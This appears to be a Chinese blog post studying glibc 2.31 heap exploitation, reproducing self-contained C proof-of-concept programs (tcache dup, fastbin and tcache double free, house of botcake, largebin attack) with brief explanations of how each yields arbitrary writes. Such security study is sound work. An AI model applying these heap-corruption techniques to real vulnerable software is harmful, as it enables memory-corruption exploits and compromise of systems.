学习的一下高版本的libc的利用方式。

  项目地址:https://github.com/StarCross-Tech/heap_exploit_2.31

tcache_dup

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main(int argc,char **argv)

 5 {

 6     //this is tcache

 7     /*

 8     *typedef struct tcache_entry

 9     {

10         struct tcache_entry *next;

11    //This field exists to detect double frees.

12         struct tcache_perthread_struct *key;

13     } tcache_entry;

14      */

15     setbuf(stdout, 0);

16     setbuf(stderr, 0);

17     printf("tcache_dup can help you achieve \"arbitrary address writes\"\n");

18     void *p,*q,*r,*d;

19     p = malloc(0x10);

20     q = malloc(0x10);

21     free(p);

22     printf("now , we have a tcache which is already free\n");

23     printf("We can modify its next pointer!\n");

24     *(uint64_t *)p = (uint64_t)q;

25     printf("now p's next pointer = q\n");

26     printf("p's next = %p ,q = %p\n",*(uint64_t *)p,q);

27     printf("so,We can malloc twice to get a pointer to q,sure you can change this to what you want!\n");

28     r = malloc(0x10);

29     d = malloc(0x10);

30     printf("OK!, we get we want!\n");

31 }

  u1s1,我看完之后没有任何收获。

fastbin_double_free

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main()

 5 {

 6     /*this is double free related security mechanisms in glibc 2.29.

 7      *    if (__builtin_expect (old == p, 0))

 8       malloc_printerr ("double free or corruption (fasttop)");

 9     * */

10     setbuf(stdout, 0);

11     setbuf(stderr, 0);

12     printf("fastbin_double_free can help you achieve \"arbitrary address writes\"\n");

13

14     void *q,*r,*d;

15     void *p[7];

16     printf("First of all ,we need to Apply for heap blocks of the same size to consume tcache!\n");

17     for(int i=0;i<7;i++)

18     {

19         p[i] = malloc(0x10);

20         printf("p[%d]  ===>  %p\n",i,p[i]);

21     }

22     q = malloc(0x10);

23     r = malloc(0x10);

24     printf("now , we need to free 7 heap blocks to populate tcache linked list!\n");

25     for(int i=0;i<7;i++)

26     {

27         printf("now free p[%d]  ===>  %p\n",i,p[i]);

28         free(p[i]);

29         p[i] = 0;

30     }

31     printf("now ,Our free heap blocks will be put into fastbin\n");

32     printf("now free q  ===>  %p\n",q);

33     free(q);

34     printf("in order to achieve double free , we need to free another block to bypass check in glibc 2.29 !\n");

35     printf("now free r  ===>  %p\n",r);

36     free(r);

37     printf("now we free q again!\n");

38     printf("now free q  ===>  %p\n",q);

39     free(q);

40     printf("OK,we already achieve double free in glibc 2.29.!\n");

41 }

  利用思路是,先free掉7个chunk来填充tcache,然后就和2.23的double free一样,free(a),free(b),free(a)来达到任意地址写。

tcache_double_free

源代码:

 1 #include<stdio.h>

 2 #include<stdlib.h>

 3 #include<inttypes.h>

 4 int main(int argc,char **argv)

 5 {

 6     //glibc 2.29 Security Mechanism

 7     /*

 8      *if (__glibc_unlikely (e->key == tcache))

 9       {

10         tcache_entry *tmp;

11         LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);

12         for (tmp = tcache->entries[tc_idx];

13          tmp;

14          tmp = tmp->next)

15           if (tmp == e)

16         malloc_printerr ("free(): double free detected in tcache 2");

17         // If we get here, it was a coincidence.  We've wasted a

18            few cycles, but don't abort.

19       }

20      */

21     setbuf(stdout, 0);

22     setbuf(stderr, 0);

23     printf("tcache_double_free can help you achieve \"arbitrary address writes\"\n");

24     void *p,*q,*r,*d;

25     p = malloc(0x10);

26     free(p);

27     printf("now we already free p = %p\n",p);

28     printf("we can change its key to help us achieve double free\n");

29     printf("its key = %p,now\n",*(uint64_t *)(p+8));

30     *(uint64_t *)(p + 8) = 0x122220;

31     printf("after we change,its key = %p\n",*(uint64_t *)(p+8));

32     printf("so we can achieve double free!");

33     free(p);

34     printf("now we already achieve double free in glibc 2.29");

35     return 0;

36 }

  在2.29及以上,chunk被free后存在tache时,为了检测是否被double free引入一个key值。再具体的东西我也不懂(菜狗不想看glibc源码)。

  这个例子的利用思路就是,free(a),然后修改a这个chunk的key值,然后就可以继续free(a)了,然后就可以实现任意写了。

house_of_botcake

源代码:

 1 #include <stdio.h>

 2 #include <stdlib.h>

 3 #include <inttypes.h>

 4

 5 static uint64_t victim = 0;

 6 int main()

 7 {

 8     setbuf(stdin, NULL);

 9     setbuf(stdout, NULL);

10

11     printf("Inspired by how2heap\n");

12     printf("You can use this technique to create chunk overlap, only relies on double free.\n");

13

14     printf("\n1. Alloc 7 chunks to fill up tcache list\n");

15

16     char *x[7];

17     for(int i=0; i<7; i++){

18         x[i] = malloc(0x100);

19     }

20

21     printf("\n2. Prepare two chunk with the same size as befor, for consolidation in unsortedbin\n");

22

23     char *a = malloc(0x100);

24     char *b = malloc(0x100);

25

26     printf("Padding chunk to prevent consolidation\n");

27     malloc(0x10);

28

29     printf("\n3. Fill in the tcache list and consolidation two prepared chunk in unsortedbin\n");

30     for(int i=0; i<7; i++){

31         free(x[i]);

32     }

33

34     free(b);

35     free(a);

36

37     printf("\n4. Get a chunk from tcache list and make chunk overlap\n");

38     malloc(0x100);

39

40     free(b);

41     printf("Now, chunk %p will be freed into tcache list\n", b);

42

43     char* res = malloc(0x130);

44     printf("Size is not matched with tcache list, so get chunk from unsortedbin, which makes chunk overlap\n");

45

46     *(uint64_t*)(res+0x110) = (uint64_t)(&victim);

47

48     printf("Now, you can control tcache list to alloc arbitrary address\n");

49     malloc(0x100);

50

51     char *target = malloc(0x100);

52     printf("Before attack, victim's value: 0x%lx\n", victim);

53     *(uint64_t*)target = 0xdeadbeef;

54     printf("After attack, victim's value: 0x%lx\n", victim);

55

56     return 0;

57 }

  利用double free构造堆块重叠。

  首先将tcache填充满,然后free两个同样大小的堆块a和b,让a和b合并。将tcache中的一个chunk申请出来,然后再次free掉b堆块,此时b堆块既在unsortedbin中,又在tcache链中。

  修改b堆块的fd指针为victim_addr,申请两次chunk,第二次就申请到victim_addr了。

largebin_attack

源代码:

 1 #include <stdio.h>

 2 #include <stdlib.h>

 3 #include <inttypes.h>

 4

 5 static uint64_t victim;

 6

 7 int main()

 8 {

 9     setbuf(stdout, 0);

10     setbuf(stderr, 0);

11

12     printf("You can use this technique to write a big number to arbitrary address\n");

13     char *p1, *p2, *p3;

14     printf("\n1. Create two chunk, and free the larger one into largebin list\n");

15

16     p1 = malloc(0x458);

17     malloc(0x18);

18     p2 = malloc(0x448);

19     malloc(0x18);

20

21     free(p1);

22     //trigger

23     malloc(0x600);

24

25     printf("Now the chunk %p is in largebin\n", p1);

26

27     printf("\n2. Free the smaller one into unsortedbin, and change chunk's bk_nextsize in largebin to &victim-0x20\n");

28     free(p2);

29     printf("Now the chunk %p is in unsortedbin\n", p2);

30

31     *(uint64_t*)(p1+0x18) = (uint64_t)(&victim)-0x20;

32

33     printf("\n3. Alloc a size not match the the chunk size in unsortedbin\n");

34     printf("It will trigger largebin attack, write a big number to victim\n");

35     printf("Before attack, victim's value: 0x%lx\n", victim);

36     malloc(0x68);

37     printf("After attack, victim's value: 0x%lx\n", victim);

38

39     return 0;

40 }

  创建两个大于0x400的chunk(a)和chunk(b),先将chunk(a)释放掉,让chunk(a)先落入unsortedbin中,再创建size比这个chunk(a)大的堆块,此时的chunk(a)就会进入largebins。

  将chunk(b)释放掉,将chunk(a)的bk_nextsize修改为victim-0x20,此时chunk(b)在unsortedbin中,申请一个比chunk(b)小的chunk,就会触发largebin attack,在victim处留下一个较大的数。

heap exploit about ptmalloc in glibc version 2.31的更多相关文章

  1. OD: Heap Exploit : DWORD Shooting & Opcode Injecting

    堆块分配时的任意地址写入攻击原理 堆管理系统的三类操作:分配.释放.合并,归根到底都是对堆块链表的修改.如果能伪造链表结点的指针,那么在链表装卸的过程中就有可能获得读写内存的机会.堆溢出利用的精髓就是 ...

  2. linux系统编程:获取glibc的版本号

    我的环境是ubuntu16.04 glibc官网:http://www.gnu.org/software/libc/libc.html 方法一.一般来说,涉及到库调用的程序,在链接时候都会链接到gli ...

  3. 检测Linux glibc幽灵漏洞和修补漏洞

    1.首先安装rpm : sudo apt-get install rpm   wget -OGHOST-test.sh http://www.antian365.com/lab/linux0day/G ...

  4. Linux Glibc幽灵漏洞紧急修补方案【转】

    转自:http://blog.csdn.net/chen19870707/article/details/43560823 幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者 ...

  5. tcmalloc jemalloc 和ptmalloc 对比

    ptmalloc 是glibc的内存分配管理 tcmalloc 是google的内存分配管理模块 jemalloc 是BSD的提供的内存分配管理 三者的性能对比参考从网上的一个图如下: 自己测试了一下 ...

  6. 极客时间-左耳听风-程序员攻略-Linux系统、内存和网络

    程序员练级攻略:Linux系统.内存和网络 Linux 系统相关 Red Hat Enterprise Linux 文档 . Linux Insides ,GitHub 上的一个开源电子书,其中讲述了 ...

  7. 安装 jemalloc for mysql

    参考: MySQL bug:https://bugs.mysql.com/bug.php?id=83047&tdsourcetag=s_pcqq_aiomsg https://github.c ...

  8. 2.Linux文件IO编程

    2.1Linux文件IO概述 2.1.0POSIX规范 POSIX:(Portable Operating System Interface)可移植操作系统接口规范. 由IEEE制定,是为了提高UNI ...

  9. gdb常用命令(转)

    pwn常常会用到gdb,看到一篇不错的文章,记录了很多命令:https://www.jianshu.com/p/c3e5f5972b21 gdb 基础调试命令 s step,si步入 n 执行下一条指 ...

随机推荐

  1. 未能加载文件或程序集“Microsoft.CodeDom.Providers.DotNetCompilerPlatform

    "/"应用程序中的服务器错误. 未能加载文件或程序集"Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Versio ...

  2. myeclipse配置pydev插件

    下载PyDev插件 myeclipse10最好配PyDev2.7的版本,比较简单, 解压之后,进入文件夹.发现里面只有两个文件夹,将这两个文件夹复制 到myeclipse的文件下面,myeclipse ...

  3. Ubuntu 18.04.5 LTS Ceph集群之 cephx 认证及使用普通用户挂载RBD和CephFS

    1.cephx认证和授权 1.1 CephX认证机制 Ceph使用cephx协议对客户端进行身份认证: 1.每个MON都可以对客户端进行身份验正并分发密钥, 不存在单点故障和性能瓶颈 2. MON会返 ...

  4. 贪心/构造/DP 杂题选做Ⅲ

    颓!颓!颓!(bushi 前传: 贪心/构造/DP 杂题选做 贪心/构造/DP 杂题选做Ⅱ 51. CF758E Broken Tree 讲个笑话,这道题是 11.3 模拟赛的 T2,模拟赛里那道题的 ...

  5. [NOIP2017 提高组] 宝藏

    考虑到这种对于某种操作顺序有一个权值. 且这个权值有一个\(O(n)\)或者更好的复杂度求出. 求最值. 那可以用模拟退火. #include<iostream> #include< ...

  6. Codeforces 840E - In a Trap(树分块+trie)

    Codeforces 题面传送门 & 洛谷题面传送门 一道非常精彩,同时也很经典的题目.和这场的 C 一样经典 首先看到这个数据范围先猜正解复杂度:\(n\) 级别大于 \(q\),所以大概是 ...

  7. Atcoder Grand Contest 030 F - Permutation and Minimum(DP)

    洛谷题面传送门 & Atcoder 题面传送门 12 天以前做的题了,到现在才补/yun 做了一晚上+一早上终于 AC 了,写篇题解纪念一下 首先考虑如果全是 \(-1\)​ 怎么处理.由于我 ...

  8. R语言实战-Part 2笔记

    R 语言实战(第二版) part 2 基本方法 -------------第6章 基本图形------------------ #1.条形图 #一般是类别型(离散)变量 library(vcd) he ...

  9. 【机器学*与R语言】2-懒惰学*K*邻(kNN)

    目录 1.理解使用KNN进行分类 KNN特点 KNN步骤 1)计算距离 2)选择合适的K 3)数据准备 2.用KNN诊断乳腺癌 1)收集数据 2)探索和准备数据 3)训练模型 4)评估模型的性能 5) ...

  10. Zabbix源码安装,使用service命令管理zabbix进程

    1.       前期环境: Zabbix源代码解压包:/root/zabbix-3.0.27 Zabbix安装路径:/usr/local/zabbix-3.0.27 2.       复制启动脚本到 ...